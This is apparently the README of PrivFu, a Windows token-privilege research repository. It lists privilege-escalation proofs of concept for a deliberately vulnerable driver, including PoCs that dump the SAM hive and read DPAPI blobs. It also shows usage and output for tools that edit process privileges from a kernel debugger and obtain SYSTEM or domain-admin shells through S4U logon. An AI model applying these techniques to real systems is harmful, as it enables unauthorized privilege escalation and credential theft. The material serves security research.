PrivFu
Kernel mode WinDbg extension and PoCs for testing how token privileges work.
There are notable repository and articles about token privilege abuse such Grzegorz Tworek's Priv2Admin. Codes in this repository are intended to help investigate how token privileges work.
Table Of Contents
ArtsOfGetSystem
This project covers how to get system privileges from high integrity level shell. See README.md for details.
KernelWritePoCs
The purpose of this project is to investigate how attackers abuse arbitrary kernel write vulnerability. All PoCs are written for HackSys Extreme Vulnerable Driver. Most of these PoCs perform to get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges. Tested on Windows 10 version 1809/1903, but they should work most of Windows 10 theoretically:
PoC Name | Description |
---|---|
CreateAssignTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeAssignPrimaryTokenPrivilege . |
CreateImpersonateTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege . |
CreateTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege . |
DebugInjectionVariant | This PoC performs EoP with SeDebugPrivilege . Uses code injection to winlogon.exe at final stage. |
DebugUpdateProcVariant | This PoC performs EoP with SeDebugPrivilege . Creates SYSTEM process from winlogon.exe with UpdateProcThreadAttribute API at final stage. |
RestoreServiceModificationVariant | This PoC performs EoP with SeRestorePrivilege . Use HijackShellLib with this PoC. |
SecondaryLogonVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege . Uses secondary logon service at final stage. |
TakeOwnershipServiceModificationVariant | This PoC performs EoP with SeTakeOwnershipPrivilege . Use HijackShellLib with this PoC. |
TcbS4uAssignTokenVariant | This PoC performs EoP with SeTcbPrivilege . Get System mandatory level shell from medium mandatory level. |
TcbS4uImpersonationVariant | This PoC performs EoP with SeTcbPrivilege . Performs thread impersonation with S4U logon. Not get high or system integrity level. |
PrivEditor
Warning
In some environment, Debug build does not work. Release build is preferred.
PrivEditor is kernel mode WinDbg extension to manipulate token privilege of specific process. This extension makes it easy to configure the token privilege you want to investigate:
0: kd> .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
PrivEditor - Kernel Mode WinDbg extension for token privilege edit.
Commands :
+ !getps : List processes in target system.
+ !getpriv : List privileges of a process.
+ !addpriv : Add privilege(s) to a process.
+ !rmpriv : Remove privilege(s) from a process.
+ !enablepriv : Enable privilege(s) of a process.
+ !disablepriv : Disable privilege(s) of a process.
+ !enableall : Enable all privileges available to a process.
+ !disableall : Disable all privileges available to a process.
[*] To see command help, execute "!<Command> help" or "!<Command> /?".
getps Command
This command is to list processes in your target system:
0: kd> !getps /?
!getps - List processes in target system.
Usage : !getps [Process Name]
Process Name : (OPTIONAL) Specifies filter string for process name.
If you execute this command without any arguments, this command list all processes in your target system as follows:
0: kd> !getps
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
0 0xfffff805`81233630 0x00000000`00000000 Idle
4 0xffffd60f`ec068380 0xffffaf00`cec07a40 System
68 0xffffd60f`f1780480 0xffffaf00`d3b290a0 svchost.exe
88 0xffffd60f`ec0db080 0xffffaf00`cec0d080 Registry
324 0xffffd60f`ef342040 0xffffaf00`d0416080 smss.exe
348 0xffffd60f`f052f100 0xffffaf00`d25d30a0 dwm.exe
408 0xffffd60f`eca8e140 0xffffaf00`d21bd930 csrss.exe
480 0xffffd60f`f05a8340 0xffffaf00`d2568670 svchost.exe
484 0xffffd60f`efcd60c0 0xffffaf00`d06430e0 wininit.exe
500 0xffffd60f`efd130c0 0xffffaf00`d23100a0 csrss.exe
580 0xffffd60f`efdc0080 0xffffaf00`d2266630 winlogon.exe
--snip--
If you want to know specific processes, set string filter as follows. The filter works with forward matching and case insensitive:
0: kd> !getps micro
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
4568 0xffffd60f`f14ed080 0xffffaf00`d3db60a0 MicrosoftEdge.exe
4884 0xffffd60f`f1647080 0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
4892 0xffffd60f`f1685080 0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe
getriv Command
This command is to list token privileges of a specific process:
0: kd> !getpriv /?
!getpriv - List privileges of a process.
Usage : !getpriv <PID>
PID : Specifies target process ID.
To use this command, you need to set a target process ID in decimal format as follows:
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
addpriv Command
This command is to add token privilege(s) to a specific process:
0: kd> !addpriv /?
!addpriv - Add privilege(s) to a process.
Usage : !addpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
+ IncreaseQuota : SeIncreaseQuotaPrivilege.
+ MachineAccount : SeMachineAccountPrivilege.
+ Tcb : SeTcbPrivilege.
+ Security : SeSecurityPrivilege.
+ TakeOwnership : SeTakeOwnershipPrivilege.
+ LoadDriver : SeLoadDriverPrivilege.
+ SystemProfile : SeSystemProfilePrivilege.
+ Systemtime : SeSystemtimePrivilege.
+ ProfileSingleProcess : SeProfileSingleProcessPrivilege.
+ IncreaseBasePriority : SeIncreaseBasePriorityPrivilege.
+ CreatePagefile : SeCreatePagefilePrivilege.
+ CreatePermanent : SeCreatePermanentPrivilege.
+ Backup : SeBackupPrivilege.
+ Restore : SeRestorePrivilege.
+ Shutdown : SeShutdownPrivilege.
+ Debug : SeDebugPrivilege.
+ Audit : SeAuditPrivilege.
+ SystemEnvironment : SeSystemEnvironmentPrivilege.
+ ChangeNotify : SeChangeNotifyPrivilege.
+ RemoteShutdown : SeRemoteShutdownPrivilege.
+ Undock : SeUndockPrivilege.
+ SyncAgent : SeSyncAgentPrivilege.
+ EnableDelegation : SeEnableDelegationPrivilege.
+ ManageVolume : SeManageVolumePrivilege.
+ Impersonate : SeImpersonatePrivilege.
+ CreateGlobal : SeCreateGlobalPrivilege.
+ TrustedCredManAccess : SeTrustedCredManAccessPrivilege.
+ Relabel : SeRelabelPrivilege.
+ IncreaseWorkingSet : SeIncreaseWorkingSetPrivilege.
+ TimeZone : SeTimeZonePrivilege.
+ CreateSymbolicLink : SeCreateSymbolicLinkPrivilege.
+ DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
+ All : All privileges.
For example, if you want to set SeDebugPrivilege to a specific process, set a target process ID for the first argument and shorten privilege name debug
as listed in the help message for second argument as follows:
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
0: kd> !addpriv 5704 debug
[>] Trying to add SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
The privilege name argument is case insensitive.
If you want to add all token privileges at a time, set all
as the privilege name argument:
0: kd> !addpriv 5704 all
[>] Trying to add all privileges.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeMachineAccountPrivilege Disabled
SeTcbPrivilege Disabled
SeSecurityPrivilege Disabled
--snip--
rmpriv Command
This command is to remove token privilege(s) from a specific process:
0: kd> !rmpriv /?
!rmpriv - Remove privilege(s) from a process.
Usage : !rmpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
If you want to remove SeChangeNotifyPrivilege, execute this command as follows:
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
0: kd> !rmpriv 352 changenotify
[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
As !addpriv
command, you can remove all token privileges at a time by setting all
as the privilege name argument:
0: kd> !rmpriv 352 all
[>] Trying to remove all privileges.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
enablepriv Command
This command is to enable token privilege(s) of a specific process:
0: kd> !enablepriv /?
!enablepriv - Enable privilege(s) of a process.
Usage : !enablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
The first argument is for process ID, and the second is for token privilege name:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
If you tried to enable privilege(s), not added yet, this command adds it automatically:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 debug
[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
disablepriv Command
This command is to disable token privilege(s) of a specific process:
0: kd> !disablepriv /?
!disablepriv - Disable privilege(s) of a process.
Usage : !disablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
To use this command, set a target process ID for the first argument and token privilege name for the second argument:
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !disablepriv 1932 debug
[>] Trying to disable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
enableall Command
This command is to enable all token privilege(s) available for a specific process:
0: kd> !enableall /?
!enableall - Enable all privileges available to a process.
Usage : !enableall <PID>
PID : Specifies target process ID.
It works as follows:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !enableall 3792
[>] Trying to enable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
disableall Command
This command is to disable all token privilege(s) for a specific process:
0: kd> !disableall /?
!disableall - Disable all privileges available to a process.
Usage : !disableall <PID>
PID : Specifies target process ID.
This command is equivalent to !disablepriv <PID> all
. Works as follows:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !disableall 3792
[>] Trying to disable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
PrivilegedOperations
This project is PoCs for sensitive token privileges such SeDebugPrivilege
.
Currently, released PoCs for a part of them.
Program Name | Description |
---|---|
SeAuditPrivilegePoC | This PoC tries to create new security event(s) by SeAuditPrivilegePoC . SeAuditPrivilege does not require high integrity level, but this PoC requires administrative privileges at the first execution to install new event source. Additionally, to confirm the result, this PoC may require modification of local security policy setting. |
SeBackupPrivilegePoC | This PoC tries to dump HKLM\SAM by SeBackupPrivilege . |
SeCreatePagefilePrivilegePoC | This PoC tries to set pagefile option to specific values by SeCreatePagefilePrivilege . |
SeCreateTokenPrivilegePoC | This PoC tries to create a elevated token by SeCreateTokenPrivilege . |
SeDebugPrivilegePoC | This PoC tries to open a handle to winlogon.exe by SeDebugPrivilege . |
SeRestorePrivilegePoC | This PoC tries to write test file in C:\Windows\System32\ by SeRestorePrivilege . |
SeSecurityPrivilegePoC | This PoC tries to read the latest security event by SeSecurityPrivilege . |
SeShutdownPrivilegePoC | This PoC tries to cause BSOD by SeShutdownPrivilege . |
SeSystemEnvironmentPrivilegePoC | This PoC tries to enumerate system environment by SeSystemEnvironmentPrivilege . Works for UEFI based system only. Due to OS functionality, this PoC does not work for OSes earlier Windows 10 Build 1809. |
SeTakeOwnershipPrivilegePoC | This PoC tries to change the owner of HKLM:\SYSTEM\CurrentControlSet\Services\dmwappushservice to the caller user account by SeTakeOwnershipPrivilege . |
SeTcbPrivilegePoC | This PoC tries to perform S4U Logon to be Builtin\Backup Operators by SeTcbPrivilege . |
SeTrustedCredManAccessPrivilegePoC | This PoC tries to access DPAPI blob by SeTrustedCredManAccessPrivilege . |
S4uDelegator
This tool is to perform S4U logon with SeTcbPrivilege. To perform S4U logon with this tool, administrative privileges are required. Currently, a few operations are implemented (more operations will be implemented in future):
C:\dev>S4uDelegator.exe -h
S4uDelegator - Tool for S4U Logon.
Usage: S4uDelegator.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ lookup - Lookup account's SID.
+ shell - Perform S4U logon and get shell.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
lookup Module
This command is to lookup account SID as follows:
C:\dev>S4uDelegator.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSO\david
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:\dev>S4uDelegator.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:\dev>S4uDelegator.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSO\Domain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
If you don't specify domain name with -d
option, use local computer name as domain name:
C:\dev>hostname
CL01
C:\dev>S4uDelegator.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01\admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
shell Module
This command is to get interactive shell with S4U logon:
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
============= =============================================
contoso\david S-1-5-21-3654360273-254804765-2004310818-1104
C:\dev>S4uDelegator.exe -m shell -u admin
[>] Target account to S4U:
|-> Account Name : CL01\admin
|-> Account Sid : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
|-> User Principal Name : (NULL)
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 7140
[+] Impersonation is successful.
[>] Trying to MSV S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
========== =============================================
cl01\admin S-1-5-21-2659926013-4203293582-4033841475-500
If you want to add token groups, you can specify them comma separated SID values with -e
option as follows:
C:\Tools>whoami
contoso\david
C:\Tools>S4uDelegator.exe -m shell -d contoso -u administrator -e s-1-5-18,S-1-5-19
[>] Target account to S4U:
|-> Account Name : CONTOSO\administrator
|-> Account Sid : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
|-> User Principal Name : [email protected]
[>] Group SID to add:
|-> [VALID] NT AUTHORITY\SYSTEM (SID : S-1-5-18) will be added.
|-> [VALID] NT AUTHORITY\LOCAL SERVICE (SID : S-1-5-19) will be added.
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 2660
[+] Impersonation is successful.
[>] Trying to Kerberos S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Tools>whoami
contoso\administrator
C:\Tools>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SYSTEM Well-known group S-1-5-18 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\LOCAL SERVICE Well-known group S-1-5-19 Mandatory group, Enabled by default, Enabled group
CONTOSO\Group Policy Creator Owners Group S-1-5-21-3654360273-254804765-2004310818-520 Mandatory group, Enabled by default, Enabled group
CONTOSO\Domain Admins Group S-1-5-21-3654360273-254804765-2004310818-512 Mandatory group, Enabled by default, Enabled group
CONTOSO\Schema Admins Group S-1-5-21-3654360273-254804765-2004310818-518 Mandatory group, Enabled by default, Enabled group
CONTOSO\Enterprise Admins Group S-1-5-21-3654360273-254804765-2004310818-519 Mandatory group, Enabled by default, Enabled group
Service asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group
CONTOSO\Denied RODC Password Replication Group Alias S-1-5-21-3654360273-254804765-2004310818-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\System Mandatory Level Label S-1-16-16384
SwitchPriv
This tool is to enable or disable specific token privileges for a process:
C:\dev>SwitchPriv.exe -h
SwitchPriv - Tool to control token privileges.
Usage: SwitchPriv.exe [Options]
-h, --help : Displays this help message.
-e, --enable : Specifies token privilege to enable. Case insensitive.
-d, --disable : Specifies token privilege to disable. Case insensitive.
-r, --remove : Specifies token privilege to remove. Case insensitive.
-f, --find : Specifies token privilege to find.
-p, --pid : Specifies the target PID. Default specifies PPID.
-i, --integrity : Specifies integrity level to set.
-g, --get : Flag to get available privileges for the target process.
-s, --system : Flag to run as "NT AUTHORITY\SYSTEM".
-l, --list : Flag to list values for --enable, --disable, --remove and --integrity options.
To list values for --enable
, --disable
, --remove
and --integrity
options, execute this tool with --list
flag as follows:
C:\dev>SwitchPriv.exe -l
Available values for --enable, --disable, and --remove options:
+ CreateToken : Specifies SeCreateTokenPrivilege.
+ AssignPrimaryToken : Specifies SeAssignPrimaryTokenPrivilege.
+ LockMemory : Specifies SeLockMemoryPrivilege.
+ IncreaseQuota : Specifies SeIncreaseQuotaPrivilege.
+ MachineAccount : Specifies SeMachineAccountPrivilege.
+ Tcb : Specifies SeTcbPrivilege.
+ Security : Specifies SeSecurityPrivilege.
+ TakeOwnership : Specifies SeTakeOwnershipPrivilege.
+ LoadDriver : Specifies SeLoadDriverPrivilege.
--snip--
Available values for --integrity option:
+ 0 : UNTRUSTED_MANDATORY_LEVEL
+ 1 : LOW_MANDATORY_LEVEL
+ 2 : MEDIUM_MANDATORY_LEVEL
+ 3 : MEDIUM_PLUS_MANDATORY_LEVEL
+ 4 : HIGH_MANDATORY_LEVEL
+ 5 : SYSTEM_MANDATORY_LEVEL
+ 6 : PROTECTED_MANDATORY_LEVEL
+ 7 : SECURE_MANDATORY_LEVEL
If you want to control privilege for a remote process, specify the target PID as follows.
For example, to enable SeUndockPrivilege for PID 7584, execute with --enable
option as follows:
C:\dev>SwitchPriv.exe -p 6968 -e undock
[>] Trying to enable SeUndockPrivilege.
[*] Target PID : 6968
[*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.
To list current token privileges for the target process, execute with --get
flag as follws:
C:\dev>SwitchPriv.exe -p 6968 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 6968
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
To perform any actions as SYSTEM, set --system
flag as follows:
C:\dev>SwitchPriv.exe -p 1140 -g -s
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 1140
[*] Process Name : svchost
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 28 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
For example, to enable SeChangeNotifyPrivilege, execute with --disable
option as follows:
C:\dev>SwitchPriv.exe -p 8520 -d changenotify
[>] Trying to disable SeChangeNotifyPrivilege.
[*] Target PID : 8520
[*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.
C:\dev>SwitchPriv.exe -p 8520 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 8520
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ================
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege EnabledByDefault
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
If you don't specify --pid
option, targets parent process of this tool as follows:
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\dev>SwitchPriv.exe -e timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Target PID : 9468
[*] Process Name : cmd
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Enabled
C:\dev>SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9468
[*] Process Name : cmd
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
To remove privilege, use --remove
option as follows:
C:\dev>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
